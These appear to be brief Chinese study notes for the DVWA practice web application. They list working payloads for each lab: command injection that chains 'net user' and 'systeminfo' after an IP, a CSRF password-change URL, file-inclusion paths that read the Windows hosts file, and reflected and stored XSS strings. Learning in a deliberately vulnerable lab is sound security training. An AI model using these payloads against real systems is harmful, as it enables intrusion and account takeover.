爆破
- 初级中级正常爆破
- 高级
命令注入
- 在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”,修改”charset=gb2312”,即可
- 127.0.0.1&net user
- 127.0.0.1&systeminfo
- 高级127.0.0.1|systeminfo
csrf
- http://192.168.21.132/abc/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
- DVWA之CSRF漏洞(详细)_以菜之名的博客-CSDN博客_csrf dvwa
文件包含
- php.ini开启allow_url_include
- ?page=C:\WINDOWS\system32\drivers\etc\hosts
- ?page=C:\\WINDOWS\\system32\\drivers\\etc\\hosts
- ?page=file://C:\\WINDOWS\\system32\\drivers\\etc\\hosts
文件上传
- 初级中级正常过
- 高级文件包含,对文件后缀做了白名单
不安全的验证码
sql注入
- 正常注get
- post 过滤\x00 \n \r \ ' " \x1a
- 和low一样
xss反射
- '<script>alert(1)</script>
- <svg onload=prompt(1)>
- 同上
xss存储型
- 抓包,用户名<svg onload=prompt(1)>即可